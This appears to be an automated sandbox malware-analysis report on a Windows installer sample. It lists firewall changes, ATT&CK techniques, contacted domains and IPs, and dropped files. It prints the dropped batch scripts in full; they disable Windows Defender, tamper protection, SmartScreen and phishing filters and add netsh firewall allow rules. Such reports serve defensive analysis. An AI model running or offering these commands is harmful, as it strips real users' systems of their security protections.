Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 97796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 97468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 97359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 97250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: netsh.exe, 00000003.00000002.1688950019.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: netsh.exe, 00000001.00000003.1684836607.0000000000891000.00000004.00000020.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1724753354.0000000001632000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

API call chain: ExitProcess graph end node

graph_0-3536

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private	Jump to behavior
Source: C:\Users\user\Desktop\KYagm8gq5S.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\explorer.exe	Jump to behavior

Source: PowerRun64.exe.0.dr

Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

0_2_0040352F

Source: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=nggwslounqxvwf dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe" enable=yes profile=public,private

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\Desktop\KYagm8gq5S.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	12 Process Injection	21 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 File Deletion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KYagm8gq5S.exe	42%	ReversingLabs	Win32.Adware.Nemesis
KYagm8gq5S.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\BasicCalculator1.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SetACL64.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\WebView.exe	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx40_Full_setup.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx45_Full_setup.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://ppp84k45ss7ehy8ypic5x.limelightcdn.com	0%	Avira URL Cloud	safe
http://www.dantsteinfeld.clickd	0%	Avira URL Cloud	safe
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe	0%	Avira URL Cloud	safe
https://helgeklein.com	0%	Avira URL Cloud	safe
http://www.dantsteinfeld.clickC:	0%	Avira URL Cloud	safe
http://ppp84k45ss7ehy8ypic5x.limelightcdn.comd	0%	Avira URL Cloud	safe
http://www.dantsteinfeld.click/t	0%	Avira URL Cloud	safe
http://www.dantsteinfeld.click/	0%	Avira URL Cloud	safe
http://www.dantsteinfeld.click	0%	Avira URL Cloud	safe
https://helgeklein.com.	0%	Avira URL Cloud	safe
http://www.dantsteinfeld.clickT	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ppp84k45ss7ehy8ypic5x.limelightcdn.com	23.106.59.18	true	false		unknown
www.dantsteinfeld.click	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.dantsteinfeld.click/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ppp84k45ss7ehy8ypic5x.limelightcdn.com	nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dantsteinfeld.clickC:	nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://helgeklein.com	SetACL64.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.dantsteinfeld.clickd	nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe	SetACL64.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.dantsteinfeld.click/t	nggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	KYagm8gq5S.exe	false		high
https://google.com	WebView.exe.0.dr	false		high
http://ppp84k45ss7ehy8ypic5x.limelightcdn.comd	nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dantsteinfeld.click	nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1725274847.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, nggwslounqxvwf.exe, 00000005.00000002.1724753354.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	nggwslounqxvwf.exe, 00000005.00000002.1725274847.000000000369E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://helgeklein.com.	SetACL64.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.dantsteinfeld.clickT	nggwslounqxvwf.exe, 00000005.00000002.1725274847.0000000003641000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.106.59.18	ppp84k45ss7ehy8ypic5x.limelightcdn.com	United Kingdom		205544	LEASEWEB-UK-LON-11GB	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581896
Start date and time:	2024-12-29 09:11:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KYagm8gq5S.exe renamed because original name is a hash value
Original Sample Name:	59586c94ee121385d362a60382217b4e.exe
Detection:	MAL
Classification:	mal76.evad.winEXE@11/23@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 38 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Execution Graph export aborted for target nggwslounqxvwf.exe, PID 7424 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:11:58	API Interceptor	26x Sleep call for process: nggwslounqxvwf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.106.59.18	Order No 24.exe	Get hash	malicious	FormBook	Browse	www.vehiculargustav.click/95c0/
	RFQ.exe	Get hash	malicious	FormBook	Browse	www.vehiculargustav.click/95c0/
	statement of accounts.exe	Get hash	malicious	FormBook	Browse	www.vehiculargustav.click/95c0/
	RFQ.exe	Get hash	malicious	FormBook	Browse	www.vehiculargustav.click/95c0/
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	www.vehiculargustav.click/95c0/
	SecuriteInfo.com.FileRepMalware.15071.2577.exe	Get hash	malicious	Unknown	Browse	dotdo.net/chkn.php?n=4528372

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ppp84k45ss7ehy8ypic5x.limelightcdn.com	Order No 24.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	RFQ.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	statement of accounts.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	RFQ.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	23.106.59.18

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LEASEWEB-UK-LON-11GB	loligang.spc.elf	Get hash	malicious	Mirai	Browse	95.168.190.109
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	95.168.183.180
	Order No 24.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	RFQ.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	statement of accounts.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	RFQ.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	23.106.59.18
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	23.106.59.52
	SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elf	Get hash	malicious	Mirai	Browse	95.168.183.162
	SecuriteInfo.com.FileRepMalware.15071.2577.exe	Get hash	malicious	Unknown	Browse	23.106.59.18

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe	Auu2j0pT0B.exe	Get hash	malicious	Unknown	Browse
	4hIPvzV6a2.exe	Get hash	malicious	Unknown	Browse
	3Dut8dFCwD.exe	Get hash	malicious	Unknown	Browse
	Ms63nDrOBa.exe	Get hash	malicious	Unknown	Browse
	Ptmhbplhxb.exe	Get hash	malicious	Unknown	Browse
	P196hUN2fw.exe	Get hash	malicious	Unknown	Browse
	e4.exe	Get hash	malicious	RedLine	Browse
	2dOeahdsto.exe	Get hash	malicious	Xmrig	Browse
	bQQHP9ciRL.exe	Get hash	malicious	Xmrig	Browse
	DllHost.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nggwslounqxvwf.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1058
Entropy (8bit):	5.356262093008712
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
MD5:	B2EFBF032531DD2913F648E75696B0FD
SHA1:	3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
SHA-256:	4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
SHA-512:	79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\0.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	205
Entropy (8bit):	4.845887375192556
Encrypted:	false
SSDEEP:	6:hAjsH1dPfk7xzdfL21Yd3iiTKQlm/ZiF5c0IJOBeIv:uwDk47Qlmx6a05z
MD5:	2C0CB84EE7D566EA0242DECBCAB08E6E
SHA1:	36C47EA55677CA87D3CE278252F678724AF680B5
SHA-256:	EB791EC4EF14A8D3F3EF80D6DF36EAD0FBCB415DF2A593C3E580293F1DF64C63
SHA-512:	066D57A8E19DF0C53BCFB12BA63BD5FA7EA94851C149B131B6F23220AA6C477DCCC5F4B0FCDF77928C1ED5184C3677A480579010AD74AA7CEDF688A978A23F88
Malicious:	false
Reputation:	low
Preview:	@echo off..cd %~dp0..set locationa=Windows ..set locationb=Defender..set location=%locationa%%locationb%..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%" -ot reg -actn setowner -ownr "n:Administrators"..

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1-1.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.015634078898154
Encrypted:	false
SSDEEP:	24:yq7lGtinWlGTNlGqinWlGQNlGhinWlGaEhNlGaE4i8:b7lGtflGTNlGqflGQNlGhflGaEhNlGar
MD5:	083164AAD1CE8289B60949ADFBC31AE9
SHA1:	BF17A464C54C3A678EFC87952B2F42EA60AC7C27
SHA-256:	AD095AF9CE6AE27B6C28B656DC3AE32C8DF8C6EB099958DA32A94FA3964DA640
SHA-512:	C8581B1EB83CAC051B9C9502C21DEC59AE5DCEBFA00E6367D7110BEFA335D3EEC497022BF9180FEC16ED3D8C78762B23D0571E5D66EBC3F8893E7C4AE54CF27F
Malicious:	false
Reputation:	low
Preview:	@echo off & title f & color 17..cd %~dp0..set location=Windows Defender..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%" -ot reg -actn ace -ace "n:Administrators;p:full"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\Features" -ot reg -actn setowner -ownr "n:Administrators"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\Features" -ot reg -actn ace -ace "n:Administrators;p:full"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"..SetACL64 -on "HKLM\SOFTWARE\Microsoft\%location%\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"..

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1-2.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.146642159934979
Encrypted:	false
SSDEEP:	24:LMnx+dxkLoxVGxaEW8d6YXYdOuPVBdEY9PVBxfWki9odV/fey:c+XkLgVmaEW8QyGfPVr9PpfWl92ley
MD5:	65DA3B5ED9035081ACFB05832F1D9DBD
SHA1:	2F07E41C6C0C96919E759C1EBD811113554261C9
SHA-256:	C442CAE06755A3F8196501F099AA760E47204251BEAF189FD4BF816F87BBDD23
SHA-512:	3D66AF2F61104D6F194B5C1152E11C72E07C967170457D51025BF34BF8B3E0D04259ADC92E93860487CC27A98ED9656498B41E8C04D3269E8876D4ECFFBDC0D0
Malicious:	false
Preview:	@echo off..cd %~dp0..set location=Windows Defender..set ltgt=DisableAntiVirus..reg add "HKLM\SOFTWARE\Microsoft\%location%" /v "%ltgt%" /t reg_DWORD /d "1" /f..reg add "HKLM\SOFTWARE\Microsoft\%location%\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f..reg add "HKLM\SOFTWARE\Microsoft\%location%\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f..reg add "HKLM\SOFTWARE\Microsoft\%location%\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f..reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f..reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f..reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1-3.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	415
Entropy (8bit):	5.13999192389547
Encrypted:	false
SSDEEP:	12:VwaaK5q1ey4m8zL6sl0Rm8zL6u0Rm8zhu1Jl0X:yOq1z4dL6kodL6uod6y
MD5:	5095897E2D18B891657D34A7E4C59147
SHA1:	E069D4B9FFDD1E48D08D2E38D8D2E474A42D5682
SHA-256:	FA1C60E30F24C409C22ABB8C0C0B2F349A7DF048D6F6808447C8285B64391358
SHA-512:	380E82810864F41A33169FC19DC5EC3FB94909D4F0AB36B9C2A32AFC587999B13A561A1BFBB22D504CAA8E7665B89A7737BE8BA2C73085F379B7381770D32971
Malicious:	false
Preview:	@echo off & title f & color 17..cd %~dp0..set location=Windows Defender..set loyyy=PhishingFilter..reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\%loyyy%" /v "EnabledV9" /t reg_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\%loyyy%" /v "PreventOverride" /t reg_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\%loyyy%" /v "EnabledV9" /t reg_DWORD /d 0 /f..

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\1519

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	444BCB3A3FCF8389296C49467F27E1D6
SHA1:	7A85F4764BBD6DAF1C3545EFBBF0F279A6DC0BEB
SHA-256:	2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF
SHA-512:	9FBBBB5A0F329F9782E2356FA41D89CF9B3694327C1A934D6AF2A9DF2D7F936CE83717FB513196A4CE5548471708CD7134C2AE99B3C357BCABB2EAFC7B9B7570
Malicious:	false
Preview:	ok

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\2.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	628
Entropy (8bit):	5.155311584565821
Encrypted:	false
SSDEEP:	12:VwpZ2m8sXEv0RonQEmhd49s8V7hd490RoAXhd49OoAuiWC290X:ypZ2oAoO449Zj49oP49OpG9y
MD5:	DCFD4A862C3D75762927765955811793
SHA1:	669B67AD983C7676F5846E137181F8CCBA9361C3
SHA-256:	95E78DCAC65E6801078CD5E7EEC70AA7A0738732B80AFDFEA22D9DBA1CDE2144
SHA-512:	131E4480E5FDA11ED918BA22568C8F69A1C0DDDD9D01A707E270FA9ED27283B0608E4865D1D7F13A36B76AC8600326B4FEC7FF1B3A912DF62F23EED7CDF7A610
Malicious:	false
Preview:	@echo off & title f & color 17..cd %~dp0..set location=Microsoft..reg add "HKLM\SOFTWARE\Policies\%location%\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\%location%\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f..reg add "HKCU\SOFTWARE\Policies\%location%\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f..reg add "HKLM\SOFTWARE\%location%\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f..reg add "HKLM\SOFTWARE\%location%\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f..

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-1.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	956
Entropy (8bit):	5.04288440669859
Encrypted:	false
SSDEEP:	24:yQaxVdJnVQG9JnVdJnVMMQPfnpnVMHfnJnVMimvVgad4+C:RyTJnqG9JnTJnAHpnIJnxmvSwTC
MD5:	7A53F49CC19B3CB657AAC4EC762482D0
SHA1:	0C131C4FA261AAB93A66C74839EF992D958FCFE2
SHA-256:	19508584771CE254AA45D4D8FAE1D3D4C91CCB77F35E059975C371C43B627E10
SHA-512:	73DD7C9884908BA45115D1344288583DB0141A20BA6B5A68952E14A4FBE282029E6456CEE386B2223F50571EB001F5936F79EE05488055BA3084E5CDD3D94D7F
Malicious:	false
